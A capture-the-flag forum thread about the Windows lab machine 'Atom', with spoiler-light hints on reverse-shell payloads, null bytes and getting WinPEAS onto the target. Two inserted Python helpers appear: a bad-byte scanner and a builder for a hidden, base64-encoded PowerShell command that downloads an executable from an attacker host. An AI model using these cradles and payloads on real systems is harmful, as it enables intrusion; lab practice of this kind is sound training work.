Official Atom Discussion

Finally rooted! User was honestly a lot harder than root imo, since the steps to it are pretty vague.

User/foothold: Enumerate like you usually would; at some point you should stumble across something that will vaguely point you in the right direction. Now do some Google-fu. If you're like me, make sure not to be lazy about reading and researching; you'll only waste your time if you copy something without understanding it.

Root: Enumerate the target machine as usual. You might stumble across something that will give you déjà vu. If not, look at what's being used on the machine and what ports are open, and Google some stuff again. Once you connect the dots, privesc is pretty straightforward and is the easier part of this box imo.

After a painfully long time I finally rooted it. A lot of it has to do with the fact that this is the first Windows box I've attempted in months, but it's still fairly difficult if you're unaware of what you're supposed to be looking for.

Tips for user: This one came to me fairly quickly; not sure if it was blind luck or what, but it's fairly easy to come by during your usual enumeration checklist. It may seem like a far reach to begin with, but a bit of Googling will show you exactly what you need. In my case it was the first search result.

Tips for root: Honestly, without a sanity check from a helpful user I probably would've ignored this or left it until last. As previous people have mentioned, this service is sending outbound connections; that information, tied with a short winPEAS search, will hopefully give you all you need. It may take you a hot minute to figure out what to do with what you find from that service, but enumerating some common places in the user folder will lead you to your answer.

Hello everyone,

I'm stuck on the foothold and would appreciate some help.
I have my .y** file and an .e**. I can see my file is getting downloaded on the server, but then nothing happens.
I'm using mvm to generate the payload and mi/h***r to catch the revsh. I tried so many different payloads (with/without encoding (2-3 encodings)) and different ports; I don't know what to do anymore :neutral:
(I'm using the flags -p, -f, -o (and -e when encoding).)

Would any of you know what could be the cause?

Thank you and happy hacking!

Hi,

I just got user and I was having the same issues as you with the rev shell not happening. It ended up being something in the name of the file that needs to be included for the exploit to work. If you found the blog about this vulnerability, please check it again and you will find out what it is that you are missing. Well, that was the issue in my case.

If still stuck let me know.

Pepe

@Netpal said:

Hello everyone,

I'm stuck on the foothold and would appreciate some help.
I have my .y** file and an .e**. I can see my file is getting downloaded on the server, but then nothing happens.
I'm using mvm to generate the payload and mi/h***r to catch the revsh. I tried so many different payloads (with/without encoding (2-3 encodings)) and different ports; I don't know what to do anymore :neutral:
(I'm using the flags -p, -f, -o (and -e when encoding).)

Would any of you know what could be the cause?

Thank you and happy hacking!

When getting the foothold, you may have to play with the .**l file a bit. Don't just follow the PoC. Understand what the real vulnerability is. Then make your own exploit. Remember what a "null byte" is and that you have to remove bytes like that.

If you get stuck DM me.
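The null-byte point above is generic payload hygiene: msfvenom's `-b '\x00'` option asks the encoder to avoid listed bytes, but it is worth confirming the output really is clean before blaming the target. The scanner below is an added example for this thread, not code from any of the posts or from the box's exploit; it assumes the payload is a raw blob (as written by `msfvenom ... -f raw -o shell.bin`) and that NUL is the only forbidden value by default, with the bad-byte set extendable for other delivery paths.

```python
"""Scan a generated payload for bytes the delivery path cannot carry.

Added example for this thread, not code from the original posts. Assumes
the payload is a raw binary blob (msfvenom -f raw) and that the null byte
is the only forbidden value by default; extend the bad set for other
paths (0x0a/0x0d for line-based parsers, 0x27 for single-quoted strings).
"""
from typing import Iterable, List, Tuple

# Default forbidden set: just NUL. An assumption for this example.
BAD_BYTES = frozenset({0x00})


def find_bad_bytes(payload: bytes, bad: Iterable[int] = BAD_BYTES) -> List[Tuple[int, int]]:
    """Return (offset, value) for every occurrence of a forbidden byte."""
    bad_set = frozenset(bad)
    return [(i, b) for i, b in enumerate(payload) if b in bad_set]


def summarize(payload: bytes, bad: Iterable[int] = BAD_BYTES) -> str:
    """Human-readable report: either 'clean' or the offending offsets."""
    hits = find_bad_bytes(payload, bad)
    if not hits:
        return f"clean: {len(payload)} bytes, no forbidden values"
    lines = [f"{len(hits)} forbidden byte(s) in {len(payload)} bytes:"]
    for offset, value in hits:
        lines.append(f"  offset 0x{offset:04x}: 0x{value:02x}")
    return "\n".join(lines)


def scan_file(path: str, bad: Iterable[int] = BAD_BYTES) -> List[Tuple[int, int]]:
    """Scan a payload written to disk, e.g. the -o output of msfvenom."""
    with open(path, "rb") as fh:
        return find_bad_bytes(fh.read(), bad)


if __name__ == "__main__":
    # Constructed sample: a NOP sled, then an x86 'mov eax, 0' whose
    # immediate is four NUL bytes, then 'ret'. Not taken from the box.
    sample = b"\x90\x90\x90\xb8\x00\x00\x00\x00\xc3"
    print(summarize(sample))
    # Same check with a wider bad set for a path that chokes on quotes/newlines.
    print(summarize(b"\x27\x41\x0a\x42", {0x00, 0x0a, 0x0d, 0x27}))
```

Run it against the real output of your generator after adding `-b` to the command line; if offsets still come back, the chosen encoder could not satisfy the constraint and you need a different encoder or payload, not a different port.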

@pp123 said:
Hi,

I just got user and I was having the same issues as you with the rev shell not happening. It ended up being something in the name of the file that needs to be included for the exploit to work. If you found the blog about this vulnerability, please check it again and you will find out what it is that you are missing. Well, that was the issue in my case.

If still stuck let me know.

Pepe

Hi @pp123, thank you for your answer! Well, I've been following the article from the start :confused:
My file contains a "'" in its name, as indicated in the article. I also tried to exclude bad characters from the payload as suggested by @kavigihan, but it doesn't work either.

I'm starting to wonder if the issue could come from Metasploit, because I had warnings when using mv*m (due to a recent RubyGems update, I think). I resolved those warnings by tinkering with commands, but there may still be a problem.


At this point I’d be grateful if someone could just PM me their command to generate the payload.

Thank you!

Edit: I got it :smiley: It worked with another payload.
I was blindly following advice to use a Meterpreter one, but it worked with another one!

Hey everyone!

I have a question regarding PE. Many of you used WinPEAS, but how did you upload it on the target?

I finally found a command that works, but I'm asking out of curiosity. Prior to finding that command, I tried various PowerShell and "normal" Windows commands containing quotes, and they all crashed my reverse shell (Session manipulation failed: Unmatched double quote). Do you guys know why?

Also, which .exe do you use? I just tried with x64 but it doesn't work (that's what I used in my msf***** payload).

Thanks!

@Netpal said:

Edit: I got it :smiley: It worked with another payload.
I was blindly following advice to use a Meterpreter one, but it worked with another one!

I got it working with a meterpreter payload.

I have a question regarding PE. Many of you used WinPEAS, but how did you upload it on the target?

I didn't upload WinPEAS, but I had a Meterpreter shell and could just use the upload option.

There are a lot of ways you can send data to boxes though:

  • powershell
  • curl
  • LOLBAS
  • SMB

(Session manipulation failed: Unmatched double quote). Do you guys know why?

Sounds a bit like a typo in the command, possibly failing to escape something.
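The "Unmatched double quote" text is what Ruby's Shellwords raises when the console splits a command line into arguments, so a command with unbalanced or nested quotes is rejected locally before anything reaches the target. One way around that for the PowerShell transfer option listed above is to hand the whole script to `powershell -EncodedCommand`, which takes base64 of UTF-16LE text and therefore contains no quote characters at the layer the console parses. The helper below is an added example for this thread, not code from any of the posts; the attacker IP, file name and destination path are placeholders.

```python
"""Build a PowerShell -EncodedCommand one-liner so nested quotes never reach
the remote shell's argument parser.

Added example for this thread, not code from the original posts. The URL,
file name and destination path used in the demo are placeholders.
PowerShell's -EncodedCommand expects base64 of UTF-16LE text.
"""
import base64


def encode_ps(script: str) -> str:
    """Return the base64 form that -EncodedCommand expects (UTF-16LE input)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_ps(encoded: str) -> str:
    """Inverse of encode_ps, for checking what PowerShell will actually run."""
    return base64.b64decode(encoded).decode("utf-16-le")


def download_script(url: str, dest: str) -> str:
    """PowerShell snippet that fetches url over HTTP and writes it to dest.

    Single quotes are used inside the script; it would not matter either way,
    because the whole script is base64-wrapped before it is typed anywhere.
    """
    return f"(New-Object Net.WebClient).DownloadFile('{url}', '{dest}')"


def build_command(url: str, dest: str) -> str:
    """Full line to paste at a cmd or Meterpreter shell prompt.

    -nop skips profiles, -w hidden avoids a console window, -enc is the
    accepted short form of -EncodedCommand. No quote characters exist at
    this layer, so the console's argument splitter has nothing to reject.
    """
    return f"powershell -nop -w hidden -enc {encode_ps(download_script(url, dest))}"


if __name__ == "__main__":
    # Placeholder attacker host and target path (assumptions, not from the box).
    cmd = build_command("http://10.10.14.2/winPEASx64.exe", r"C:\Users\Public\wp.exe")
    print(cmd)
    # Round-trip: the script PowerShell will decode and execute.
    print(decode_ps(cmd.split()[-1]))
```

Serve the file with any HTTP server on the attacker side (`python3 -m http.server 80` is enough), paste the printed line into the shell, and verify the download by size rather than by trusting the absence of an error, since a hidden window swallows PowerShell's own messages.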

@TazWake said:

Hi @TazWake, thank you for your answer :slight_smile:

@Netpal said:

Edit: I got it :smiley: It worked with another payload.
I was blindly following advice to use a Meterpreter one, but it worked with another one!

I got it working with a meterpreter payload.

That's weird, I tried several different options and couldn't get it to work.
I'll try again and see if it works.


I have a question regarding PE. Many of you used WinPEAS, but how did you upload it on the target?

I didn't upload WinPEAS, but I had a Meterpreter shell and could just use the upload option.

Ah right, I forgot we could do that with Meterpreter


There are a lot of ways you can send data to boxes though:

  • powershell
  • curl
  • LOLBAS
  • SMB

I didn't know about LOLBAS, thank you for the info. In my case HTTP was the easiest way of doing it, but I'll try the other options you mentioned.

(Session manipulation failed: Unmatched double quote). Do you guys know why?

Sounds a bit like a typo in the command, possibly failing to escape something.

You might be right; however, I found those commands in articles explaining file transfers from Kali to Windows, so it's weird that they don't work.

Have a nice day!

got user and root. Fun machine :slight_smile:

GET /l*****.**l HTTP/1.1" 200
But never spawns my reverse shell

Any help?

@k01n said:

GET /l*****.**l HTTP/1.1" 200
But never spawns my reverse shell

Any help?

User done!
But holy, how slowly this machine works, wtf.

@k01n said:

GET /l*****.**l HTTP/1.1" 200
But never spawns my reverse shell

Any help?

Stuck at the same phase, any help???

@pagal said:

@k01n said:

GET /l*****.**l HTTP/1.1" 200
But never spawns my reverse shell

Any help?

Stuck at the same phase, any help???

Read the PoC, understand where the real vulnerability lies. Don't just copy and paste.
Build your own.
DM if you are stuck.

Rooted!
Very cool machine to do; I love Windows machines and the experience gained when trying to hack them.

User: Enumerate and use Google to find interesting things.
Careful when creating the pieces necessary for exploitation; I banged my head and lost hours due to lack of attention.

Root: First time I've done a machine where root is easier than user.

Feel free to send a PM if you need help; if I don't respond immediately you can reach me on Telegram @WhoamiAlves


Rooted!
Very cool machine to do; I love Windows machines and the experience gained when trying to hack them.

User: Enumerate and use Google to find interesting things.
Careful when creating the pieces necessary for exploitation; I banged my head and lost hours due to lack of attention.

Root: First time I've done a machine where root is easier than user.

Feel free to send a PM if you need help; if I don't respond immediately you can reach me on Telegram @WhoamiAlves

#RecifePOXA!

Rooted. Heaps of good info in this thread. Pretty finicky machine for user, and root needs you to put a couple of things together.

DM if you need a push

Finally rooted! Man, I made mistakes with this one :smiley:

@k01n said:

@k01n said:

GET /l*****.**l HTTP/1.1" 200
But never spawns my reverse shell

Any help?

User done!
But holy, how slowly this machine works, wtf.

Exactly how slowly? I've been waiting for about half an hour. My M*********r session opens and closes, and the .**l file has been ingested.

@dobrocat said:

@k01n said:

@k01n said:

GET /l*****.**l HTTP/1.1" 200
But never spawns my reverse shell

Any help?

User done!
But holy, how slowly this machine works, wtf.

Exactly how slowly? I've been waiting for about half an hour. My M*********r session opens and closes, and the .**l file has been ingested.

Yeah, me too mate; every command I write takes like 10 secs to execute. If I try to download something with PowerShell it's impossible, because the download never ends.
I don't know what's wrong with this machine.

@k01n said:

@dobrocat said:

@k01n said:

@k01n said:

GET /l*****.**l HTTP/1.1" 200
But never spawns my reverse shell

Any help?

User done!
But holy, how slowly this machine works, wtf.

Exactly how slowly? I've been waiting for about half an hour. My M*********r session opens and closes, and the .**l file has been ingested.

Yeah, me too mate; every command I write takes like 10 secs to execute. If I try to download something with PowerShell it's impossible, because the download never ends.
I don't know what's wrong with this machine.

Cheers. It’s gotten worse ten hours later. I think this box is getting hammered by folks trying to get it before it retires tomorrow. Reckon I’ll move on and forget about this one for points and CPEs. Onward!

Thanks for replying.